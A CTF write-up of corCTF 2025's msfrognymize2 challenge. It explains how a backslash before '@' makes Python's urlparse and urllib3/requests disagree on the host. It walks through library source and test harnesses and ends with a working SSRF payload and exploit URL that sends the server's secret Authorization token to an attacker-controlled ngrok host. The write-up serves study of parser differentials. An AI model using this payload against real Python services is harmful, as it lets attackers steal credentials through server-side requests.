Sunday, September 14, 2025

corCTF 2025 - Python URL Parsing Confusion

corCTF is maintained by the Crusaders of Rust Team.

This is a great CTF for web, with some really hard and creative challenges. In 2025, one of them explored Python URL parsing confusion, which is worth understanding in detail.

I played the 2 previous editions and it continues to be awesome. We already wrote some writeups on their challenges:

  • 2024: https://fireshellsecurity.team/corctf2024-challenge-dev/
  • 2023: https://fireshellsecurity.team/corctf2023-web/

The idea here is to dive deep into the specific parsing behaviours that this challenge exploits.

Challenge: web-msfrognymize2 (20 solves)

Difficulty: 👽👽👽👾👾👾👾👾👾👾

First-Look

This is actually a new version of the original 2023 msfrognymize challenge, which we solved 😎

You send a photo and it hides the faces using some image processing libs.

For some random reason, I used a picture of Eva Longoria, and it worked fine.

The URL of the new image is:

http://localhost:8443/anonymized/?uuid=97472287-8588-4f77-b98b-ab3ae7607c0e

As we can see, it generates a UUIDv4 for each newly generated image.

Architecture

Before diving into the code, it’s better to understand the app architecture.

The application is a little bit more complex, because it processes the uploads asynchronously (steps 1 to 5). Just ignore the missing step 8. I just won’t fix the image anymore 😆 lazy writing.

The key here is understanding step 6, where there is an SSRF opportunity that we will discuss.

Code Analysis

The code is much bigger here, so we won’t get into too much detail. There is some interesting crypto metadata, but it does not help our solution.

The flag is in secret.py:

API_TOKEN = "corctf{EXAMPLE_FLAG}"

It is used in app.py:

#...
import requests
from urllib.parse import urljoin, urlparse
from secret import API_TOKEN
#...

@app.route('/anonymized/')
def serve_image():
    image_uuid = ""
    try:
        image_uuid = request.args.get('uuid')
        
        # ====> FOCUS!! <===
        url = create_file_url(image_uuid)
        resp = requests.get(url, headers={"Authorization": f"Token {API_TOKEN}"})
        # ====> END FOCUS <===
        
        if resp.status_code != 200:
            raise ValueError("File does not exist according to fileserver")

        return send_file(
            io.BytesIO(resp.content),
            mimetype="image/png",
            as_attachment=False,
            download_name=f"{image_uuid}.png"
        )
    except Exception as e:
        return f"Image {image_uuid} cannot be found: {e}.", 404
    
def create_file_url(uuid):
    file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)

    parsed = urlparse(file_url)

    if parsed.scheme != "http":
        raise ValueError("Invalid sheme")
    if parsed.hostname != "127.0.0.1":
        raise ValueError("Invalid host")
    if parsed.port != 8000:
        raise ValueError("Invalid port")

    return file_url
#...

It requests a “file URL”, sending a token (the flag) in the Authorization header. If we can make that URL point to a server we control, the app will send the token to us.

The create_file_url function creates a new URL using a fixed (so far) http://127.0.0.1:8000 address, by joining the UUID as path, using urllib.parse.urljoin. This is the address of the File Server Flask service mentioned in the architecture, which looks like this, in a regular scenario:

http://127.0.0.1:8000/97472287-8588-4f77-b98b-ab3ae7607c0e

This new URL is then re-parsed, using urllib.parse.urlparse, to validate it and avoid SSRF attacks, checking the protocol, hostname and port.

After returning, the app uses the joined URL string (not the re-parsed result) to GET the file contents, using requests.get, and then returns them to the user as an image.

Find the Hack

At this point, it is pretty clear that we need to abuse those url parsing complex steps to get an SSRF.

We need a URL that will:

  1. bypass the urljoin to change localhost to our bad boy server address.
  2. bypass the urlparse to pass the checks for localhost and port.
  3. make requests.get use our server address, so it actually sends the flag key to us.

We have to find a parsing confusion between urlparse and requests.get to achieve this.

URL Confusion and the Hacking Scenario

In 2017, the hacker Orange Tsai published the excellent article A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!, showing that URL parsing is actually pretty hard and prone to confusion between different implementations.

Since then, many hackers have expanded his research and found new URL parsing confusions in other implementations.

urllib vs. urllib3 vs. requests

urllib is the standard, native library from Python 3 to work with URLs. urllib3 is a third-party HTTP client for Python. Those are different implementations.

requests - HTTP for Humans - is a simple and popular http library. Behind the scenes, it uses urllib3, so we will focus on the difference between the urllib* implementations above.

urljoin

The urljoin function allows us to add components to a URL, like this:

urljoin("http://abc.com", "def")
'http://abc.com/def'

It turns out that joining URLs is a dangerous adventure here, as advised in the function documentation.

Warning: Because an absolute URL may be passed as the url parameter, it is generally not secure to use urljoin with an attacker-controlled url. For example in, urljoin(“https://website.com/users/”, username), if username can contain an absolute URL, the result of urljoin will be the absolute URL.

So, we have this behaviour:

urljoin("http://legit.com", "http://0wned.com")
'http://0wned.com'
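To make the warning concrete, here is a small sketch of how urljoin resolves a few kinds of second argument. The base URL and file name are placeholders chosen for illustration, not part of the challenge.

```python
from urllib.parse import urljoin

BASE = "http://legit.com/users/profile"  # placeholder base URL

# Relative reference: replaces the last path segment of the base.
print(urljoin(BASE, "avatar.png"))        # http://legit.com/users/avatar.png

# Absolute path: replaces the whole path, keeps scheme and host.
print(urljoin(BASE, "/avatar.png"))       # http://legit.com/avatar.png

# Absolute URL: the base is discarded entirely.
print(urljoin(BASE, "http://0wned.com"))  # http://0wned.com
```

Only the last case changes the host, which is why the leading slash added by the app looks like a protection at first.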

So let’s look at our function, ignoring the validation at first:

def create_file_url(uuid):
    file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)
    #parsed = urlparse(file_url)
    #if parsed.scheme != "http":
    #    raise ValueError("Invalid sheme")
    #if parsed.hostname != "127.0.0.1":
    #    raise ValueError("Invalid host")
    #if parsed.port != 8000:
    #    raise ValueError("Invalid port")
    return file_url

create_file_url(str(uuid.uuid4())) # regular scenario
'http://127.0.0.1:8000/c526ffab-0b0a-4c66-bd2f-d9d491a81870'

create_file_url("http://0wned.com") # failed attack
'http://127.0.0.1:8000/http://0wned.com'

The regular scenario just shows the basic function working, and the failed attack shows that the app function has a “protection”: it puts a slash before the uuid, which turns our input into a path.

But we can still use a trick: //0wned.com/ is a valid URL reference (a scheme-relative one, which carries a host but no protocol), like this :)

create_file_url("/0wned.com")
'http://0wned.com'

Note that I used only one slash, because the original function already adds one. We have a path here to exfiltrate the key, but… we still have the urlparse validation.

def create_file_url(uuid):
    file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)
    parsed = urlparse(file_url)
    if parsed.scheme != "http":
        raise ValueError("Invalid sheme")
    if parsed.hostname != "127.0.0.1":
        raise ValueError("Invalid host")
    if parsed.port != 8000:
        raise ValueError("Invalid port")
    return file_url

create_file_url("/0wned.com") # still failed
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 7, in create_file_url
ValueError: Invalid host
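The two observations above can be reproduced with the standard library alone. This is a minimal sketch that shows why the double slash changes the host and what the validation sees afterwards; the variable names are mine.

```python
from urllib.parse import urljoin, urlsplit

# "//host" is a network-path reference: it carries an authority but no scheme.
ref = urlsplit("//0wned.com")
print(repr(ref.scheme), repr(ref.netloc))   # '' '0wned.com'

# urljoin borrows the scheme from the base and takes the authority from the reference.
joined = urljoin("http://127.0.0.1:8000", "//0wned.com")
print(joined)                               # http://0wned.com

# The validation then sees the attacker's host and no explicit port.
parsed = urlsplit(joined)
print(parsed.hostname, parsed.port)         # 0wned.com None
```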

Spoiler: Payload

At CTF time, I found the solution before actually understanding it. I was just manually fuzzing. If I had just read some articles, like this nice text from SonarSource, I would directly have found the payload.

Source: SonarSource 😌

But the fun is understanding how it works, so let’s keep going.

The testcase below helps to understand how it works.

from urllib.parse import urljoin, urlparse
import requests
import logging
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('requests').setLevel(logging.DEBUG)
logging.getLogger('urllib3').setLevel(logging.DEBUG)

def test_parsed(uuid):
    file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)
    parsed = urlparse(file_url)
    print("file_url        = ", file_url)
    print("parsed.scheme   = ", parsed.scheme)
    print("parsed.hostname = ", parsed.hostname)
    print("parsed.port     = ", parsed.port)
    print("parsed          = ", parsed)

    print('======> GETTING')
    response = requests.get(file_url)
    print(response.text)
    return parsed

The function shows the parsed components and the logger will show the URL used by the requests.get later.

Let’s start with the regular scenario, with some uuid:

test_parsed(str(uuid.uuid4()))

file_url        =  http://127.0.0.1:8000/8ff6333b-8180-4b9d-93bc-9ce305ec1238
parsed.scheme   =  http
parsed.hostname =  127.0.0.1
parsed.port     =  8000
parsed          =  ParseResult(scheme='http', netloc='127.0.0.1:8000', path='/8ff6333b-8180-4b9d-93bc-9ce305ec1238', params='', query='', fragment='')

======> GETTING
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): 127.0.0.1:8000
Traceback (most recent call last):
  File ".../lib/python3.12/site-packages/urllib3/connection.py", line 198, in _new_conn

Let’s move on to the first step of the attack.

test_parsed("/fireshellsecurity.team/a")

file_url        =  http://fireshellsecurity.team/a
parsed.scheme   =  http
parsed.hostname =  fireshellsecurity.team
parsed.port     =  None
parsed          =  ParseResult(scheme='http', netloc='fireshellsecurity.team', path='/a', params='', query='', fragment='')

======> GETTING
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): fireshellsecurity.team:80
# ...

Works as expected, but does not pass the validation.

Let’s try the authentication trick:

test_parsed("/fireshellsecurity.team@127.0.0.1:8000")

file_url        =  http://fireshellsecurity.team@127.0.0.1:8000
parsed.scheme   =  http
parsed.hostname =  127.0.0.1
parsed.port     =  8000
parsed          =  ParseResult(scheme='http', netloc='fireshellsecurity.team@127.0.0.1:8000', path='', params='', query='', fragment='')

======> GETTING
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): 127.0.0.1:8000
Traceback (most recent call last):
# ...

Both implementations respect the authentication (user@host) format: the validation passes, but the request still goes to 127.0.0.1, so we gain nothing.

But let’s (FINALLY) move to the working payload, which adds a backslash (\) before the @. The two backslashes below are only Python string escaping; the actual string contains a single one.

test_parsed("/fireshellsecurity.team\\@127.0.0.1:8000")

file_url        =  http://fireshellsecurity.team\@127.0.0.1:8000
parsed.scheme   =  http
parsed.hostname =  127.0.0.1
parsed.port     =  8000
parsed          =  ParseResult(scheme='http', netloc='fireshellsecurity.team\\@127.0.0.1:8000', path='', params='', query='', fragment='')

======> GETTING
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): fireshellsecurity.team:80
DEBUG:urllib3.connectionpool:http://fireshellsecurity.team:80 "GET /%5C@127.0.0.1:8000 HTTP/1.1" 301 None
# ...

OK! So urlparse thinks the authority is 127.0.0.1:8000, but requests.get connects to fireshellsecurity.team:80 and asks for the path /%5C@127.0.0.1:8000.
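As a sanity check, the challenge's own validation can be run against both inputs without any network access. The sketch below copies create_file_url from the code shown earlier; passes_validation is a hypothetical helper added only for this illustration.

```python
from urllib.parse import urljoin, urlparse

def create_file_url(uuid):
    # Same logic as the challenge code quoted earlier.
    file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)
    parsed = urlparse(file_url)
    if parsed.scheme != "http":
        raise ValueError("Invalid sheme")
    if parsed.hostname != "127.0.0.1":
        raise ValueError("Invalid host")
    if parsed.port != 8000:
        raise ValueError("Invalid port")
    return file_url

def passes_validation(uuid):
    # Hypothetical helper: True when create_file_url accepts the input.
    try:
        create_file_url(uuid)
        return True
    except ValueError:
        return False

print(passes_validation("/fireshellsecurity.team/a"))                 # False
print(passes_validation("/fireshellsecurity.team\\@127.0.0.1:8000"))  # True
```

This only confirms the urllib side of the story; where the request really goes depends on the HTTP client, as the debug log shows.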

We have a working testcase to bypass the SSRF protection, but…

Understanding urlparse

Let’s start by analyzing the urllib.parse source code.

The magic actually happens in the urlsplit function:

def urlsplit(url, scheme='', allow_fragments=True):
    """Parse a URL into 5 components:
    <scheme>://<netloc>/<path>?<query>#<fragment>

    The result is a named 5-tuple with fields corresponding to the
    above. It is either a SplitResult or SplitResultBytes object,
    depending on the type of the url parameter.

    The username, password, hostname, and port sub-components of netloc
    can also be accessed as attributes of the returned object.

    The scheme argument provides the default value of the scheme
    component when no scheme is found in url.

    If allow_fragments is False, no attempt is made to separate the
    fragment component from the previous component, which can be either
    path or query.

    Note that % escapes are not expanded.
    """

    url, scheme, _coerce_result = _coerce_args(url, scheme)
    # Only lstrip url as some applications rely on preserving trailing space.
    # (https://url.spec.whatwg.org/#concept-basic-url-parser would strip both)
    url = url.lstrip(_WHATWG_C0_CONTROL_OR_SPACE)
    scheme = scheme.strip(_WHATWG_C0_CONTROL_OR_SPACE)

    for b in _UNSAFE_URL_BYTES_TO_REMOVE:
        url = url.replace(b, "")
        scheme = scheme.replace(b, "")

    allow_fragments = bool(allow_fragments)
    netloc = query = fragment = ''
    i = url.find(':')
    if i > 0 and url[0].isascii() and url[0].isalpha():
        for c in url[:i]:
            if c not in scheme_chars:
                break
        else:
            scheme, url = url[:i].lower(), url[i+1:]
    if url[:2] == '//':
        netloc, url = _splitnetloc(url, 2)
        if (('[' in netloc and ']' not in netloc) or
                (']' in netloc and '[' not in netloc)):
            raise ValueError("Invalid IPv6 URL")
        if '[' in netloc and ']' in netloc:
            _check_bracketed_netloc(netloc)
    if allow_fragments and '#' in url:
        url, fragment = url.split('#', 1)
    if '?' in url:
        url, query = url.split('?', 1)
    _checknetloc(netloc)
    #v = SplitResult(scheme, netloc, url, query, fragment)
    #return _coerce_result(v)
    return (scheme, netloc, url, query, fragment)

The testcase returns the URL split into these parts:

urlsplit("http://abc.com/a/b.html#x")

('http', 'abc.com', '/a/b.html', '', 'x')

Let’s try with our payload (with some extra components):

urlsplit("//fireshellsecurity.team\\@127.0.0.1:8000/abc?a=1#x")

('', 'fireshellsecurity.team\\@127.0.0.1:8000', '/abc', 'a=1', 'x')

OK, the netloc is fireshellsecurity.team\\@127.0.0.1:8000, which is not completely parsed yet. After that, the netloc is broken down into hostname, port, user and password.

Before going down one more step, it is important to understand why the next component (path) starts at /abc. It happens in the function _splitnetloc.

def _splitnetloc(url, start=0):
    delim = len(url)   # position of end of domain part of url, default is end
    for c in '/?#':    # look for delimiters; the order is NOT important
        wdelim = url.find(c, start)        # find first of this delim
        if wdelim >= 0:                    # if found
            delim = min(delim, wdelim)     # use earliest delim position
    return url[start:delim], url[delim:]   # return (domain, rest)

The netloc ends only at the first of these chars: /, ?, #. Everything from there on is the rest of the URL (path, query, fragment). In our scenario that is the slash (/) before abc; the backslash is not a delimiter here, and this is key to the vulnerability.
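The delimiter behaviour can be observed through the public urlsplit function, without calling the private helper. A quick sketch, where a.example is a placeholder host:

```python
from urllib.parse import urlsplit

# Try each candidate delimiter right after the host.
netlocs = {}
for url in ("//a.example/x", "//a.example?x", "//a.example#x", "//a.example\\x"):
    netlocs[url] = urlsplit(url).netloc
    print(url, "->", repr(netlocs[url]))

# The first three print 'a.example'; the backslash one keeps going
# and prints 'a.example\\x' (a single backslash, shown escaped by repr).
```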

To decompose the netloc into its subcomponents, it uses the _hostinfo and _userinfo properties from _NetlocResultMixinStr:

class _NetlocResultMixinStr(_NetlocResultMixinBase, _ResultMixinStr):
    __slots__ = ()

    @property
    def _userinfo(self):
        netloc = self.netloc
        userinfo, have_info, hostinfo = netloc.rpartition('@')
        if have_info:
            username, have_password, password = userinfo.partition(':')
            if not have_password:
                password = None
        else:
            username = password = None
        return username, password

    @property
    def _hostinfo(self):
        netloc = self.netloc
        _, _, hostinfo = netloc.rpartition('@')
        _, have_open_br, bracketed = hostinfo.partition('[')
        if have_open_br:
            hostname, _, port = bracketed.partition(']')
            _, _, port = port.partition(':')
        else:
            hostname, _, port = hostinfo.partition(':')
        if not port:
            port = None
        return hostname, port

Let’s expand our testcase to include these functions (in a simpler way).

def _hostinfo(netloc):
    netloc = netloc
    _, _, hostinfo = netloc.rpartition('@')
    _, have_open_br, bracketed = hostinfo.partition('[')
    if have_open_br:
        hostname, _, port = bracketed.partition(']')
        _, _, port = port.partition(':')
    else:
        hostname, _, port = hostinfo.partition(':')
    if not port:
        port = None
    return hostname, port

def _userinfo(netloc):
    netloc = netloc
    userinfo, have_info, hostinfo = netloc.rpartition('@')
    if have_info:
        username, have_password, password = userinfo.partition(':')
        if not have_password:
            password = None
    else:
        username = password = None
    return username, password

And testing it:

#test
url = "//fireshellsecurity.team\\@127.0.0.1:8000/abc?a=1#x"

split_result = urlsplit(url)
scheme, netloc, url, query, fragment = split_result
print(split_result)

hostname, port = _hostinfo(netloc)
username, password = _userinfo(netloc)

print("Host: ", hostname)
print("Port: ", port)
print("User: ", username)
print("Pswd: ", password)

# results
('', 'fireshellsecurity.team\\@127.0.0.1:8000', '/abc', 'a=1', 'x')
Host:  127.0.0.1
Port:  8000
User:  fireshellsecurity.team\
Pswd:  None

The hostname is whatever lies between the last @ and the port delimiter (:), as expected. Note that the username includes the backslash (\), which is also important.

OK, now we are ninjas on the standard urllib. Moving on.
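The same values are exposed as attributes of the result object, so the copied helpers are not strictly needed. A short sketch using only the public API; the second string is a made-up example to show how rpartition behaves with more than one @.

```python
from urllib.parse import urlsplit

parts = urlsplit("//fireshellsecurity.team\\@127.0.0.1:8000/abc?a=1#x")
print(parts.hostname)        # 127.0.0.1
print(parts.port)            # 8000
print(repr(parts.username))  # 'fireshellsecurity.team\\' (one trailing backslash)
print(parts.password)        # None

# rpartition splits on the LAST "@", so everything before it is userinfo.
print("user@evil@127.0.0.1".rpartition("@"))  # ('user@evil', '@', '127.0.0.1')
```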

Analyzing requests.get / urllib3

Now, let’s do the same breakdown analysis of the urllib3 parsing, used by the requests library.

It happens in the parse_url function.

def parse_url(url: str) -> Url:
    """
    Given a url, return a parsed :class:`.Url` namedtuple. Best-effort is
    performed to parse incomplete urls. Fields not provided will be None.
    This parser is RFC 3986 and RFC 6874 compliant.

    The parser logic and helper functions are based heavily on
    work done in the ``rfc3986`` module.

    :param str url: URL to parse into a :class:`.Url` namedtuple.

    Partly backwards-compatible with :mod:`urllib.parse`.

    Example:

    .. code-block:: python

        import urllib3

        print( urllib3.util.parse_url('http://google.com/mail/'))
        # Url(scheme='http', host='google.com', port=None, path='/mail/', ...)

        print( urllib3.util.parse_url('google.com:80'))
        # Url(scheme=None, host='google.com', port=80, path=None, ...)

        print( urllib3.util.parse_url('/foo?bar'))
        # Url(scheme=None, host=None, port=None, path='/foo', query='bar', ...)
    """
    if not url:
        # Empty
        return Url()

    source_url = url
    if not _SCHEME_RE.search(url):
        url = "//" + url

    scheme: str | None
    authority: str | None
    auth: str | None
    host: str | None
    port: str | None
    port_int: int | None
    path: str | None
    query: str | None
    fragment: str | None

    try:
        scheme, authority, path, query, fragment = _URI_RE.match(url).groups()  # type: ignore[union-attr]
        normalize_uri = scheme is None or scheme.lower() in _NORMALIZABLE_SCHEMES

        if scheme:
            scheme = scheme.lower()

        if authority:
            auth, _, host_port = authority.rpartition("@")
            auth = auth or None
            host, port = _HOST_PORT_RE.match(host_port).groups()  # type: ignore[union-attr]
            if auth and normalize_uri:
                auth = _encode_invalid_chars(auth, _USERINFO_CHARS)
            if port == "":
                port = None
        else:
            auth, host, port = None, None, None

        if port is not None:
            port_int = int(port)
            if not (0 <= port_int <= 65535):
                raise LocationParseError(url)
        else:
            port_int = None

        host = _normalize_host(host, scheme)

        if normalize_uri and path:
            path = _remove_path_dot_segments(path)
            path = _encode_invalid_chars(path, _PATH_CHARS)
        if normalize_uri and query:
            query = _encode_invalid_chars(query, _QUERY_CHARS)
        if normalize_uri and fragment:
            fragment = _encode_invalid_chars(fragment, _FRAGMENT_CHARS)

    except (ValueError, AttributeError) as e:
        raise LocationParseError(source_url) from e

    # For the sake of backwards compatibility we put empty
    # string values for path if there are any defined values
    # beyond the path in the URL.
    # TODO: Remove this when we break backwards compatibility.
    if not path:
        if query is not None or fragment is not None:
            path = ""
        else:
            path = None

    return Url(
        scheme=scheme,
        auth=auth,
        host=host,
        port=port_int,
        path=path,
        query=query,
        fragment=fragment,
    )

OK, way more complex, but we just need a few lines of code to understand the part of the parsing that matters to us. We can do it with a much simpler testcase:

import re
import sys

# URL to analyze, taken from the command line
url = sys.argv[1]

# Same regex used by urllib3 to split a URL into its components
_URI_RE = re.compile(
    r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?"
    r"(?://([^\\/?#]*))?"
    r"([^?#]*)"
    r"(?:\?([^#]*))?"
    r"(?:#(.*))?$",
    re.UNICODE | re.DOTALL,
)

print('==> URL')
print(url)

# authority == netloc, for all effects
scheme, authority, path, query, fragment = _URI_RE.match(url).groups()

print('\n==> REGEX URL')
print('Scheme: ', scheme)
print('Netloc: ', authority)
print('Path: ', path)
print('Query: ', query)
print('fragment: ', fragment)

# Split the optional userinfo from host:port, as parse_url does
print('\n==> PARSE AUTH')
auth, _, host_port = authority.rpartition("@")
print('Auth: ', auth)
print('Host: ', host_port)

And the result:

python parse_url.py '//fireshellsecurity.team\@127.0.0.1:8000/abc?a=1#x' 

==> URL
//fireshellsecurity.team\@127.0.0.1:8000/abc?a=1#x

==> REGEX URL
Scheme:  None
Netloc:  fireshellsecurity.team
Path:  \@127.0.0.1:8000/abc
Query:  a=1
fragment:  x

==> PARSE AUTH
Auth:  
Host:  fireshellsecurity.team

The netloc now ends at the fireshellsecurity.team domain, and the localhost address is part of the path!

Let’s remember the standard urllib result for easy comparison:

# test
url = "//fireshellsecurity.team\\@127.0.0.1:8000/abc?a=1#x"

split_result = urlsplit(url)
scheme, netloc, url, query, fragment = split_result
print(split_result)

hostname, port = _hostinfo(netloc)
username, password = _userinfo(netloc)

print("Host: ", hostname)
print("Port: ", port)
print("User: ", username)
print("Pswd: ", password)

# results
('', 'fireshellsecurity.team\\@127.0.0.1:8000', '/abc', 'a=1', 'x')
Host:  127.0.0.1
Port:  8000
User:  fireshellsecurity.team\
Pswd:  None

In the case of urllib3, the component separation is done by this really complex regex split:

_URI_RE = re.compile(
    r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?"
    r"(?://([^\\/?#]*))?" # NETLOC
    r"([^?#]*)"
    r"(?:\?([^#]*))?"
    r"(?:#(.*))?$",
    re.UNICODE | re.DOTALL,
)

The second regex group captures the authority / netloc inside the URL. After the // that follows the protocol, it takes everything up to the first of these chars: \, /, ?, #.

Wait!! There is a backslash on the regex!!

We can summarize the big difference (for our purposes) as the set of characters that end the netloc component.

Library               /   ?   #   \
Standard urllib       Y   Y   Y   N
urllib3 / requests    Y   Y   Y   Y
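The table can be reproduced with a few lines. This sketch compares urlsplit against the authority sub-pattern copied from the urllib3 regex shown above; it does not import urllib3 itself, so treat it as an approximation of parse_url rather than the real thing. The helper names are mine.

```python
import re
from urllib.parse import urlsplit

# Authority sub-pattern copied from the urllib3 regex shown above.
AUTHORITY_RE = re.compile(r"//([^\\/?#]*)")

def ends_netloc_stdlib(ch):
    # True when urlsplit stops the netloc at this character.
    return urlsplit("//host" + ch + "rest").netloc == "host"

def ends_netloc_urllib3_regex(ch):
    # True when the urllib3 authority pattern stops at this character.
    return AUTHORITY_RE.match("//host" + ch + "rest").group(1) == "host"

# One row per character: char, stdlib result, urllib3 regex result.
for ch in "/?#\\":
    print(repr(ch), ends_netloc_stdlib(ch), ends_netloc_urllib3_regex(ch))
```

Only the backslash row differs (False for urlsplit, True for the urllib3 pattern), which is the whole bug.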

Exploiting 💀

Knowing what we know now, we just need to apply the payload to receive the flag. We can just set up an ngrok tunnel or similar.

/000000000000.ngrok-free.app\\@127.0.0.1:8000

The final url is like this:

https://msfrognymize2.ctfi.ng/anonymized/?uuid=/000000000000.ngrok-free.app\\@127.0.0.1:8000
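If the special characters get mangled on the way (by a browser or a shell), one option is to percent-encode the parameter. This is only a sketch under my own assumptions: it uses the placeholder tunnel host from above, a single literal backslash as in the testcase, and relies on the web framework decoding the query string as usual. It is not necessarily how the payload was sent during the CTF.

```python
from urllib.parse import urlencode, parse_qs, urlsplit

TARGET = "https://msfrognymize2.ctfi.ng/anonymized/"
# "\\" is Python escaping: the string holds one backslash before the @.
payload = "/000000000000.ngrok-free.app\\@127.0.0.1:8000"

# urlencode percent-encodes the slash, backslash, @ and colon.
exploit_url = TARGET + "?" + urlencode({"uuid": payload})
print(exploit_url)

# Decoding the query string gives back the exact payload.
decoded = parse_qs(urlsplit(exploit_url).query)["uuid"][0]
print(decoded == payload)  # True
```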

The gift arrives in our inbox.

corctf{why_4re_pyth0n_jo1n_funt10ns_s0_w3ird?!}

Takeaways

By looking a little bit at two URL parsing implementations in the same language, we found a world of difference. It looks like there is still a lot to explore, and new vulnerabilities may arise at any moment.
